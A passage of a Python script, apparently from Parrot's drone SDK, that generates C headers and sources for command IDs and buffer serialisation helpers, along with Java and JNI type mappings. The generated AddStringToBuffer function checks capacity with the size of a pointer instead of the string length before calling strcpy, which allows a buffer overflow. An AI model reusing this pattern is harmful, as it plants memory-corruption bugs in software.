xmlIndex = XMLTYPES.index (arg.argType.btfType)
else:
xmlIndex = XMLTYPES.index (arg.argType)
return SZETYPES [xmlIndex]
def xmlToReader (ftr, cmd, arg):
if isinstance(arg.argType, ArEnum):
return '(' + AREnumName (LIB_MODULE, get_ftr_old_name(ftr), arg.argType.name) + ')' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read32FromBuffer')
if isinstance(arg.argType, ArBitfield):
xmlIndex = XMLTYPES.index (arg.argType.btfType)
else:
xmlIndex = XMLTYPES.index (arg.argType)
return CREADERS [xmlIndex]
def xmlToPrinter (ftr, cmd, arg):
if isinstance(arg.argType, ArEnum):
return '(' + AREnumName (LIB_MODULE, get_ftr_old_name(ftr), arg.argType.name) + ')' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintI32')
if isinstance(arg.argType, ArBitfield):
xmlIndex = XMLTYPES.index (arg.argType.btfType)
else:
xmlIndex = XMLTYPES.index (arg.argType)
return CPRINTERS [xmlIndex]
def xmlToJava (module, ftr, cmd, arg):
if isinstance(arg.argType, ArEnum):
return ARJavaEnumType (module, get_ftr_old_name(ftr), arg.argType.name)
if isinstance(arg.argType, ArMultiSetting):
return ARJavaMultiSetType (module, get_ftr_old_name(ftr), arg.argType.name)
if isinstance(arg.argType, ArBitfield):
xmlIndex = XMLTYPES.index (arg.argType.btfType)
else:
xmlIndex = XMLTYPES.index (arg.argType)
return JAVATYPES [xmlIndex]
def jniEnumClassName (ftr, cmd, arg):
if not isinstance(arg.argType, ArEnum):
return ''
return JNI_PACKAGE_DIR + '/' + ARJavaEnumType (LIB_MODULE, get_ftr_old_name(ftr), arg.argType.name)
def jniClassName (ftr, cmd, arg):
return JNI_PACKAGE_DIR + '/' + ARJavaMultiSetType (LIB_MODULE, get_ftr_old_name(ftr), arg.argType.name)
def xmlToJavaSig (ftr, cmd, arg):
if isinstance(arg.argType, ArEnum):
return 'L' + jniEnumClassName (ftr, cmd, arg) + ';'
if isinstance(arg.argType, ArMultiSetting):
return 'L' + jniClassName (ftr, cmd, arg) + ';'
if isinstance(arg.argType, ArBitfield):
xmlIndex = XMLTYPES.index (arg.argType.btfType)
else:
xmlIndex = XMLTYPES.index (arg.argType)
return JAVASIG [xmlIndex]
def xmlToJni (ftr, cmd, arg):
if isinstance(arg.argType, ArEnum):
return 'jint'
if isinstance(arg.argType, ArBitfield):
xmlIndex = XMLTYPES.index (arg.argType.btfType)
else:
xmlIndex = XMLTYPES.index (arg.argType)
return JNITYPES [xmlIndex]
def xmlToJniCast (ftr, cmd, arg):
if isinstance(arg.argType, ArEnum):
return '(jint)'
if isinstance(arg.argType, ArBitfield):
xmlIndex = XMLTYPES.index (arg.argType.btfType)
else:
xmlIndex = XMLTYPES.index (arg.argType)
return JNIUTSCASTS [xmlIndex]
def format_cmd_name(msg, underscore=False): # project only
if underscore:
return ARCapitalize(msg.name) if msg.cls is None else ARCapitalize(msg.cls.name) + '_'+ ARCapitalize(msg.name)
else:
return msg.name if msg.cls is None else msg.cls.name + ARCapitalize(msg.name)
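# Sketch (hypothetical message names): for a command 'flatTrim' belonging to a class 'Piloting',
# format_cmd_name(msg) -> 'PilotingFlatTrim' and format_cmd_name(msg, underscore=True) -> 'Piloting_FlatTrim';
# for a class-less feature command, it is just the message name (capitalized when underscore=True).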
def get_arg_doc(arg):
doc = ''
if arg.argType in ArArgType.TO_STRING:
doc = arg.doc
else:
if arg.doc:
doc = arg.doc + '\n'
if isinstance(arg.argType, ArEnum):
doc = doc + arg.argType.doc
elif isinstance(arg.argType, ArBitfield):
doc = doc + arg.argType.enum.doc
elif isinstance(arg.argType, ArMultiSetting):
doc = doc + arg.argType.doc
return doc
def get_ftr_old_name(ftr):
FROM_NEW_NAME = { 'ardrone3':'ARDrone3', 'common_dbg':'commonDebug',
'jpsumo':'JumpingSumo', 'minidrone':'MiniDrone',
'skyctrl':'SkyController'}
if ftr.name in FROM_NEW_NAME:
return FROM_NEW_NAME[ftr.name]
else:
return ftr.name
# Sample args for testbench
SAMPLEARGS = ['42', '-42',
'4200', '-4200',
'420000', '-420000',
'420102030405ULL', '-420102030405LL',
'42.125', '-42.000001',
'"Test string with spaces"']
# Formatter for printf
PRINTFF = ['%u', '%d',
'%u', '%d',
'%u', '%d',
'%llu', '%lld',
'%f', '%f',
'%s']
def xmlToSample (ftr, cmd, arg):
if isinstance(arg.argType, ArEnum):
return '(' + AREnumName (LIB_MODULE, get_ftr_old_name(ftr), arg.argType.name) + ')0'
if isinstance(arg.argType, ArBitfield):
xmlIndex = XMLTYPES.index (arg.argType.btfType)
else:
xmlIndex = XMLTYPES.index (arg.argType)
return SAMPLEARGS [xmlIndex]
def xmlToPrintf (ftr, cmd, arg):
if isinstance(arg.argType, ArEnum):
return '%d'
if isinstance(arg.argType, ArBitfield):
xmlIndex = XMLTYPES.index (arg.argType.btfType)
else:
xmlIndex = XMLTYPES.index (arg.argType)
return PRINTFF [xmlIndex]
LICENCE_HEADER='''/*
Copyright (C) 2014 Parrot SA
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in
the documentation and/or other materials provided with the
distribution.
* Neither the name of Parrot nor the names
of its contributors may be used to endorse or promote products
derived from this software without specific prior written
permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
SUCH DAMAGE.
*/
'''
DEC_ERR_ENAME='ERROR'
GEN_ERR_ENAME='ERROR'
FIL_STATUS_ENAME='STATUS'
FIL_ERROR_ENAME='ERROR'
def interfaceName (ftr, cmd):
return JNIClassName + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Listener'
def interfaceVar (ftr, cmd):
return '_' + interfaceName (ftr, cmd)
def javaCbName (ftr, cmd):
return 'on' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'Update'
def native_generateCmds(ctx, paths):
genDebug = True
genTreeFilename = None
projects = [DEFAULTPROJECTNAME]
if not os.path.exists (paths.SRC_DIR):
os.makedirs (paths.SRC_DIR)
if not os.path.exists (paths.INC_DIR):
os.makedirs (paths.INC_DIR)
if not os.path.exists (paths.INC_DIR + LIB_NAME):
os.makedirs (paths.INC_DIR + LIB_NAME)
#################################
# 1ST PART : #
#################################
# Read XML file to local arrays #
# of commands / classes #
#################################
allFeatures = ctx.features
# Check types used
for ftr in allFeatures:
for msg in ftr.getMsgs():
for arg in msg.args:
if isinstance(arg.argType, ArEnum):
hasArgOfType[ArArgType.ENUM] = True
elif isinstance(arg.argType, ArBitfield):
hasArgOfType[ArArgType.BITFIELD] = True
hasArgOfType[arg.argType.btfType] = True
elif isinstance(arg.argType, ArMultiSetting):
hasArgOfType[ArArgType.MULTISETTING] = True
else:
hasArgOfType[arg.argType] = True
#################################
# 2ND PART : #
#################################
# Write private H files #
#################################
hfile = open (paths.COMMANDSID_HFILE, 'w')
hfile.write (LICENCE_HEADER)
hfile.write ('/********************************************\n')
hfile.write (' * AUTOGENERATED FILE *\n')
hfile.write (' * DO NOT MODIFY IT *\n')
hfile.write (' * *\n')
hfile.write (' * To add new commands : *\n')
hfile.write (' * - Modify ../Xml/commands.xml file *\n')
hfile.write (' * - Re-run generateCommandsList.py script *\n')
hfile.write (' * *\n')
hfile.write (' ********************************************/\n')
hfile.write ('\n')
hfile.write ('#ifndef ' + COMMANDSID_DEFINE + '\n')
hfile.write ('#define ' + COMMANDSID_DEFINE + ' (1)\n')
hfile.write ('\n')
hfile.write ('// ARSDK_NO_ENUM_PREPROCESS //\n')
hfile.write ('typedef enum {\n')
for ftr in allFeatures:
ENAME='FEATURE'
hfile.write (' ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, ENAME, get_ftr_old_name(ftr)) + ' = ' + str(ftr.featureId) + ',\n')
hfile.write ('} ' + AREnumName (LIB_MODULE, ID_SUBMODULE, ENAME) + ';\n')
hfile.write ('\n')
hfile.write ('\n')
hfile.write ('#define ' + ARMacroName (LIB_MODULE, ID_SUBMODULE, 'FEATURE_CLASS') + ' (0) //default class id used by features.\n')
hfile.write ('\n')
hfile.write ('\n')
#project only
for ftr in allFeatures:
if ftr.classes:
ENAME=get_ftr_old_name(ftr) + '_CLASS'
hfile.write ('typedef enum {\n')
for cl in ftr.classes:
hfile.write (' ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, ENAME, cl.name) + ' = ' + str(cl.classId) + ',\n')
hfile.write ('} ' + AREnumName (LIB_MODULE, ID_SUBMODULE, ENAME) + ';\n')
hfile.write ('\n')
hfile.write ('\n')
for ftr in allFeatures:
if ftr.classes: #project only
for cl in ftr.classes:
hfile.write ('typedef enum {\n')
ENAME=get_ftr_old_name(ftr) + '_' + cl.name + '_CMD'
first = True
for cmd in cl.cmds:
hfile.write (' ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, ENAME, cmd.name) + ' = ' + str(cmd.cmdId) + ',\n')
hfile.write ('} ' + AREnumName (LIB_MODULE, ID_SUBMODULE, ENAME) + ';\n')
hfile.write ('\n')
else:
hfile.write ('typedef enum {\n')
ENAME=get_ftr_old_name(ftr) + '_CMD'
first = True
for cmd in ftr.cmds + ftr.evts:
hfile.write (' ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, ENAME, cmd.name) + ' = ' + str(cmd.cmdId) + ',\n')
hfile.write ('} ' + AREnumName (LIB_MODULE, ID_SUBMODULE, ENAME) + ';\n')
hfile.write ('\n')
hfile.write ('\n')
hfile.write ('\n')
hfile.write ('#endif /* ' + COMMANDSID_DEFINE + ' */\n')
hfile.close ()
hfile = open(paths.COMMANDSRW_HFILE, 'w')
hfile.write ('/********************************************\n')
hfile.write (' * AUTOGENERATED FILE *\n')
hfile.write (' * DO NOT MODIFY IT *\n')
hfile.write (' * *\n')
hfile.write (' * To add new commands : *\n')
hfile.write (' * - Modify ../Xml/commands.xml file *\n')
hfile.write (' * - Re-run generateCommandsList.py script *\n')
hfile.write (' * *\n')
hfile.write (' ********************************************/\n')
hfile.write ('\n')
hfile.write ('#ifndef ' + COMMANDSRW_DEFINE + '\n')
hfile.write ('#define ' + COMMANDSRW_DEFINE + ' (1)\n')
hfile.write ('\n')
hfile.write ('#include <inttypes.h>\n')
hfile.write ('#include <string.h>\n')
hfile.write ('#include <stdlib.h>\n')
hfile.write ('\n')
hfile.write ('// ------- //\n')
hfile.write ('// WRITERS //\n')
hfile.write ('// ------- //\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.U8] or hasArgOfType[ArArgType.I8]:
hfile.write ('// Add an 8 bit value to the buffer\n')
hfile.write ('// Returns -1 if the buffer is not big enough\n')
hfile.write ('// Returns the new offset in the buffer on success\n')
hfile.write ('int32_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddU8ToBuffer') + ' (uint8_t *buffer, uint8_t newVal, int32_t oldOffset, int32_t buffCap);\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.U16] or hasArgOfType[ArArgType.I16]:
hfile.write ('// Add a 16 bit value to the buffer\n')
hfile.write ('// Returns -1 if the buffer is not big enough\n')
hfile.write ('// Returns the new offset in the buffer on success\n')
hfile.write ('int32_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddU16ToBuffer') + ' (uint8_t *buffer, uint16_t newVal, int32_t oldOffset, int32_t buffCap);\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.U32] or hasArgOfType[ArArgType.I32] or hasArgOfType[ArArgType.FLOAT] or hasArgOfType[ArArgType.ENUM]:
hfile.write ('// Add a 32 bit value to the buffer\n')
hfile.write ('// Returns -1 if the buffer is not big enough\n')
hfile.write ('// Returns the new offset in the buffer on success\n')
hfile.write ('int32_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddU32ToBuffer') + ' (uint8_t *buffer, uint32_t newVal, int32_t oldOffset, int32_t buffCap);\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.U64] or hasArgOfType[ArArgType.I64] or hasArgOfType[ArArgType.DOUBLE]:
hfile.write ('// Add a 64 bit value to the buffer\n')
hfile.write ('// Returns -1 if the buffer is not big enough\n')
hfile.write ('// Returns the new offset in the buffer on success\n')
hfile.write ('int32_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddU64ToBuffer') + ' (uint8_t *buffer, uint64_t newVal, int32_t oldOffset, int32_t buffCap);\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.STRING]:
hfile.write ('// Add a NULL Terminated String to the buffer\n')
hfile.write ('// Returns -1 if the buffer is not big enough\n')
hfile.write ('// Returns the new offset in the buffer on success\n')
hfile.write ('int32_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddStringToBuffer') + ' (uint8_t *buffer, const char *newVal, int32_t oldOffset, int32_t buffCap);\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.FLOAT]:
hfile.write ('// Add a float to the buffer\n')
hfile.write ('// Returns -1 if the buffer is not big enough\n')
hfile.write ('// Returns the new offset in the buffer on success\n')
hfile.write ('int32_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddFloatToBuffer') + ' (uint8_t *buffer, float newVal, int32_t oldOffset, int32_t buffCap);\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.DOUBLE]:
hfile.write ('// Add a double to the buffer\n')
hfile.write ('// Returns -1 if the buffer is not big enough\n')
hfile.write ('// Returns the new offset in the buffer on success\n')
hfile.write ('int32_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddDoubleToBuffer') + ' (uint8_t *buffer, double newVal, int32_t oldOffset, int32_t buffCap);\n')
hfile.write ('\n')
hfile.write ('// ------- //\n')
hfile.write ('// READERS //\n')
hfile.write ('// ------- //\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.U8] or hasArgOfType[ArArgType.I8]:
hfile.write ('// Read an 8 bit value from the buffer\n')
hfile.write ('// On error, return zero and set *error to 1, else set *error to 0\n')
hfile.write ('uint8_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read8FromBuffer') + ' (const uint8_t *buffer, int32_t capacity, int32_t *offset, int32_t *error);\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.U16] or hasArgOfType[ArArgType.I16]:
hfile.write ('// Read a 16 bit value from the buffer\n')
hfile.write ('// On error, return zero and set *error to 1, else set *error to 0\n')
hfile.write ('uint16_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read16FromBuffer') + ' (const uint8_t *buffer, int32_t capacity, int32_t *offset, int32_t *error);\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.U32] or hasArgOfType[ArArgType.I32] or hasArgOfType[ArArgType.ENUM]:
hfile.write ('// Read a 32 bit value from the buffer\n')
hfile.write ('// On error, return zero and set *error to 1, else set *error to 0\n')
hfile.write ('uint32_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read32FromBuffer') + ' (const uint8_t *buffer, int32_t capacity, int32_t *offset, int32_t *error);\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.U64] or hasArgOfType[ArArgType.I64]:
hfile.write ('// Read a 64 bit value from the buffer\n')
hfile.write ('// On error, return zero and set *error to 1, else set *error to 0\n')
hfile.write ('uint64_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read64FromBuffer') + ' (const uint8_t *buffer, int32_t capacity, int32_t *offset, int32_t *error);\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.FLOAT]:
hfile.write ('// Read a float value from the buffer\n')
hfile.write ('// On error, return zero and set *error to 1, else set *error to 0\n')
hfile.write ('float ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'ReadFloatFromBuffer') + ' (const uint8_t *buffer, int32_t capacity, int32_t *offset, int32_t *error);\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.DOUBLE]:
hfile.write ('// Read a double value from the buffer\n')
hfile.write ('// On error, return zero and set *error to 1, else set *error to 0\n')
hfile.write ('double ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'ReadDoubleFromBuffer') + ' (const uint8_t *buffer, int32_t capacity, int32_t *offset, int32_t *error);\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.STRING]:
hfile.write ('// Read a string value from the buffer\n')
hfile.write ('// On error, return NULL and set *error to 1, else set *error to 0\n')
hfile.write ('const char* ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'ReadStringFromBuffer') + ' (const uint8_t *buffer, int32_t capacity, int32_t *offset, int32_t *error);\n')
hfile.write ('\n')
hfile.write ('// -------- //\n')
hfile.write ('// TOSTRING //\n')
hfile.write ('// -------- //\n')
hfile.write ('\n')
if (hasArgOfType[ArArgType.U8] or hasArgOfType[ArArgType.I8] or
hasArgOfType[ArArgType.U16] or hasArgOfType[ArArgType.I16] or
hasArgOfType[ArArgType.U32] or hasArgOfType[ArArgType.I32] or
hasArgOfType[ArArgType.U64] or hasArgOfType[ArArgType.I64] or
hasArgOfType[ArArgType.FLOAT] or hasArgOfType[ArArgType.DOUBLE] or
hasArgOfType[ArArgType.STRING] or hasArgOfType[ArArgType.ENUM]):
hfile.write ('// Write a string in a buffer\n')
hfile.write ('// On error, return -1, else return offset in string\n')
hfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' (const char *stringToWrite, char *output, int outputLen, int outputOffset);\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.U8]:
hfile.write ('// Write a string in a buffer from an uint8_t arg\n')
hfile.write ('// On error, return -1, else return offset in string\n')
hfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintU8') + ' (const char *name, uint8_t arg, char *output, int outputLen, int outputOffset);\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.I8]:
hfile.write ('// Write a string in a buffer from an int8_t arg\n')
hfile.write ('// On error, return -1, else return offset in string\n')
hfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintI8') + ' (const char *name, int8_t arg, char *output, int outputLen, int outputOffset);\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.U16]:
hfile.write ('// Write a string in a buffer from an uint16_t arg\n')
hfile.write ('// On error, return -1, else return offset in string\n')
hfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintU16') + ' (const char *name, uint16_t arg, char *output, int outputLen, int outputOffset);\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.I16]:
hfile.write ('// Write a string in a buffer from an int16_t arg\n')
hfile.write ('// On error, return -1, else return offset in string\n')
hfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintI16') + ' (const char *name, int16_t arg, char *output, int outputLen, int outputOffset);\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.U32]:
hfile.write ('// Write a string in a buffer from an uint32_t arg\n')
hfile.write ('// On error, return -1, else return offset in string\n')
hfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintU32') + ' (const char *name, uint32_t arg, char *output, int outputLen, int outputOffset);\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.I32] or hasArgOfType[ArArgType.ENUM]:
hfile.write ('// Write a string in a buffer from an int32_t arg\n')
hfile.write ('// On error, return -1, else return offset in string\n')
hfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintI32') + ' (const char *name, int32_t arg, char *output, int outputLen, int outputOffset);\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.U64]:
hfile.write ('// Write a string in a buffer from an uint64_t arg\n')
hfile.write ('// On error, return -1, else return offset in string\n')
hfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintU64') + ' (const char *name, uint64_t arg, char *output, int outputLen, int outputOffset);\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.I64]:
hfile.write ('// Write a string in a buffer from an int64_t arg\n')
hfile.write ('// On error, return -1, else return offset in string\n')
hfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintI64') + ' (const char *name, int64_t arg, char *output, int outputLen, int outputOffset);\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.FLOAT]:
hfile.write ('// Write a string in a buffer from float arg\n')
hfile.write ('// On error, return -1, else return offset in string\n')
hfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintFloat') + ' (const char *name, float arg, char *output, int outputLen, int outputOffset);\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.DOUBLE]:
hfile.write ('// Write a string in a buffer from a double arg\n')
hfile.write ('// On error, return -1, else return offset in string\n')
hfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintDouble') + ' (const char *name, double arg, char *output, int outputLen, int outputOffset);\n')
hfile.write ('\n')
if hasArgOfType[ArArgType.STRING]:
hfile.write ('// Write a string in a buffer from a string arg\n')
hfile.write ('// On error, return -1, else return offset in string\n')
hfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintString') + ' (const char *name, const char *arg, char *output, int outputLen, int outputOffset);\n')
hfile.write ('\n')
hfile.write ('\n')
hfile.write ('#endif /* ' + COMMANDSRW_DEFINE + ' */\n')
hfile.close ()
#################################
# 3RD PART : #
#################################
# Generate private ReadWrite C #
# file #
#################################
cfile = open (paths.COMMANDSRW_CFILE, 'w')
cfile.write (LICENCE_HEADER)
cfile.write ('/********************************************\n')
cfile.write (' * AUTOGENERATED FILE *\n')
cfile.write (' * DO NOT MODIFY IT *\n')
cfile.write (' * *\n')
cfile.write (' * To add new commands : *\n')
cfile.write (' * - Modify ../Xml/commands.xml file *\n')
cfile.write (' * - Re-run generateCommandsList.py script *\n')
cfile.write (' * *\n')
cfile.write (' ********************************************/\n')
cfile.write ('#include <config.h>\n')
cfile.write ('#include <stdio.h>\n')
cfile.write ('#include "' + COMMANDSRW_HFILE_NAME + '"\n')
cfile.write ('#include <libARSAL/ARSAL_Endianness.h>\n')
cfile.write ('\n')
cfile.write ('// ------- //\n')
cfile.write ('// WRITERS //\n')
cfile.write ('// ------- //\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.U8] or hasArgOfType[ArArgType.I8]:
cfile.write ('// Add an 8 bit value to the buffer\n')
cfile.write ('// Returns -1 if the buffer is not big enough\n')
cfile.write ('// Returns the new offset in the buffer on success\n')
cfile.write ('int32_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddU8ToBuffer') + ' (uint8_t *buffer, uint8_t newVal, int32_t oldOffset, int32_t buffCap)\n')
cfile.write ('{\n')
cfile.write (' int32_t retVal = 0;\n')
cfile.write (' int32_t size = oldOffset + sizeof(newVal);\n')
cfile.write ('\n')
cfile.write (' if (buffCap < size)\n')
cfile.write (' {\n')
cfile.write (' retVal = -1;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' uint8_t *buffptr = &(buffer [oldOffset]);\n')
cfile.write (' uint8_t localVal = newVal;\n')
cfile.write (' memcpy (buffptr, &localVal, sizeof (localVal));\n')
cfile.write (' retVal = oldOffset + sizeof (localVal);\n')
cfile.write (' }\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.U16] or hasArgOfType[ArArgType.I16]:
cfile.write ('// Add a 16 bit value to the buffer\n')
cfile.write ('// Returns -1 if the buffer is not big enough\n')
cfile.write ('// Returns the new offset in the buffer on success\n')
cfile.write ('int32_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddU16ToBuffer') + ' (uint8_t *buffer, uint16_t newVal, int32_t oldOffset, int32_t buffCap)\n')
cfile.write ('{\n')
cfile.write (' int32_t retVal = 0;\n')
cfile.write (' int32_t size = oldOffset + sizeof(newVal);\n')
cfile.write ('\n')
cfile.write (' if (buffCap < size)\n')
cfile.write (' {\n')
cfile.write (' retVal = -1;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' uint8_t *buffptr = &(buffer [oldOffset]);\n')
cfile.write (' uint16_t localVal = htods (newVal);\n')
cfile.write (' memcpy (buffptr, &localVal, sizeof (localVal));\n')
cfile.write (' retVal = oldOffset + sizeof (localVal);\n')
cfile.write (' }\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.U32] or hasArgOfType[ArArgType.I32] or hasArgOfType[ArArgType.FLOAT] or hasArgOfType[ArArgType.ENUM]:
cfile.write ('// Add a 32 bit value to the buffer\n')
cfile.write ('// Returns -1 if the buffer is not big enough\n')
cfile.write ('// Returns the new offset in the buffer on success\n')
cfile.write ('int32_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddU32ToBuffer') + ' (uint8_t *buffer, uint32_t newVal, int32_t oldOffset, int32_t buffCap)\n')
cfile.write ('{\n')
cfile.write (' int32_t retVal = 0;\n')
cfile.write (' int32_t size = oldOffset + sizeof(newVal);\n')
cfile.write ('\n')
cfile.write (' if (buffCap < size)\n')
cfile.write (' {\n')
cfile.write (' retVal = -1;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' uint8_t *buffptr = &(buffer [oldOffset]);\n')
cfile.write (' uint32_t localVal = htodl (newVal);\n')
cfile.write (' memcpy (buffptr, &localVal, sizeof (localVal));\n')
cfile.write (' retVal = oldOffset + sizeof (localVal);\n')
cfile.write (' }\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.U64] or hasArgOfType[ArArgType.I64] or hasArgOfType[ArArgType.DOUBLE]:
cfile.write ('// Add a 64 bit value to the buffer\n')
cfile.write ('// Returns -1 if the buffer is not big enough\n')
cfile.write ('// Returns the new offset in the buffer on success\n')
cfile.write ('int32_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddU64ToBuffer') + ' (uint8_t *buffer, uint64_t newVal, int32_t oldOffset, int32_t buffCap)\n')
cfile.write ('{\n')
cfile.write (' int32_t retVal = 0;\n')
cfile.write (' int32_t size = oldOffset + sizeof(newVal);\n')
cfile.write ('\n')
cfile.write (' if (buffCap < size)\n')
cfile.write (' {\n')
cfile.write (' retVal = -1;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' uint8_t *buffptr = &(buffer [oldOffset]);\n')
cfile.write (' uint64_t localVal = htodll (newVal);\n')
cfile.write (' memcpy (buffptr, &localVal, sizeof (localVal));\n')
cfile.write (' retVal = oldOffset + sizeof (localVal);\n')
cfile.write (' }\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.STRING]:
cfile.write ('// Add a NULL Terminated String to the buffer\n')
cfile.write ('// Returns -1 if the buffer is not big enough\n')
cfile.write ('// Returns the new offset in the buffer on success\n')
cfile.write ('int32_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddStringToBuffer') + ' (uint8_t *buffer, const char *newVal, int32_t oldOffset, int32_t buffCap)\n')
cfile.write ('{\n')
cfile.write (' int32_t retVal = 0;\n')
cfile.write (' int32_t size = oldOffset + sizeof(newVal);\n')
cfile.write ('\n')
cfile.write (' if (buffCap < size)\n')
cfile.write (' {\n')
cfile.write (' retVal = -1;\n')
cfile.write (' }\n')
cfile.write (' else\n')
cfile.write (' {\n')
cfile.write (' char *buffptr = (char *)& (buffer [oldOffset]);\n')
cfile.write (' strcpy (buffptr, newVal);\n')
cfile.write (' retVal = oldOffset + strlen (newVal) + 1;\n')
cfile.write (' }\n')
cfile.write (' return retVal;\n')
cfile.write ('}\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.FLOAT]:
cfile.write ('// Add a float to the buffer\n')
cfile.write ('// Returns -1 if the buffer is not big enough\n')
cfile.write ('// Returns the new offset in the buffer on success\n')
cfile.write ('int32_t ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddFloatToBuffer') + ' (uint8_t *buffer, float newVal, int32_t oldOffset, int32_t buffCap)\n')
cfile.write ('{\n')
cfile.write (' union {\n')
cfile.write (' float f;\n')
cfile.write (' uint32_t u32;\n')
cfile.write (' } val = { .f = newVal };\n')
cfile.write (' return ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddU32ToBuffer') + ' (buffer, val.u32, oldOffset, buffCap);\n')
cfile.write ('}\n')
cfile.write ('\n')
if hasArgOfType[ArArgType.DOUBLE]:
cfile.write ('// Add a double to the buffer\n')
cfile.write ('// Returns -1 if the buffer is not big enough\n')
cfile.write ('// Returns the new offset in the buffer on success\n')
